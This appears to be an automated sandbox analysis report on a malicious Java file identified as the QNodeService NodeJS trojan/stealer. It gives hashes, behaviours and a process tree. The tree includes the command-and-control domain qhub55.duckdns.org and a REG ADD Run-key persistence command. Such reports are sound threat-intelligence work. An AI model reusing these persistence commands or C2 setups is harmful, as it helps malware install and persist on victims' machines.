Analysis
-
max time kernel
31s -
max time network
123s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
05-10-2020 13:11
Static task
static1
Behavioral task
behavioral1
Sample
Order30092020.jar
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Order30092020.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
Order30092020.jar
-
Size
269KB
-
MD5
43db376d6d1c00b41b79d8dd5eed3e5e
-
SHA1
04b307fb43cad6b2a4d8d6ec338009d55b0255e1
-
SHA256
f921f323a0e6f0ca53a93de02d0c5920dd4fc1ffe902c139387bf92f47e098db
-
SHA512
b2c2ee8e1b958954c20bf75cfb16d7c1c9aa38941dea484835be9603659adc13fbd64b3531a08b908a5e635c640a3953836fb91cb65a8de11b28805cde99f503
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 2220 node.exe 2192 node.exe 1292 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Software\Microsoft\Windows\CurrentVersion\Run\9cbf673c-c9be-43c0-89fa-ca7458b2d721 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ada1-166.dat js behavioral2/files/0x000100000001ada1-170.dat js behavioral2/files/0x000100000001ada1-174.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 wtfismyip.com 21 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2220 node.exe 2220 node.exe 2220 node.exe 2220 node.exe 2192 node.exe 2192 node.exe 2192 node.exe 2192 node.exe 1292 node.exe 1292 node.exe 1292 node.exe 1292 node.exe 1292 node.exe 1292 node.exe 1292 node.exe 1292 node.exe 1292 node.exe 1292 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3820 wrote to memory of 2624 3820 java.exe 73 PID 3820 wrote to memory of 2624 3820 java.exe 73 PID 2624 wrote to memory of 2220 2624 javaw.exe 77 PID 2624 wrote to memory of 2220 2624 javaw.exe 77 PID 2220 wrote to memory of 2192 2220 node.exe 79 PID 2220 wrote to memory of 2192 2220 node.exe 79 PID 2192 wrote to memory of 1292 2192 node.exe 80 PID 2192 wrote to memory of 1292 2192 node.exe 80 PID 1292 wrote to memory of 3024 1292 node.exe 82 PID 1292 wrote to memory of 3024 1292 node.exe 82 PID 3024 wrote to memory of 1240 3024 cmd.exe 83 PID 3024 wrote to memory of 1240 3024 cmd.exe 83
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\Order30092020.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\c17b823e.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain qhub55.duckdns.org3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_InYoJ9\boot.js --hub-domain qhub55.duckdns.org4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_InYoJ9\boot.js --hub-domain qhub55.duckdns.org5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9cbf673c-c9be-43c0-89fa-ca7458b2d721" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "9cbf673c-c9be-43c0-89fa-ca7458b2d721" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:1240
-
-
-
-
-
-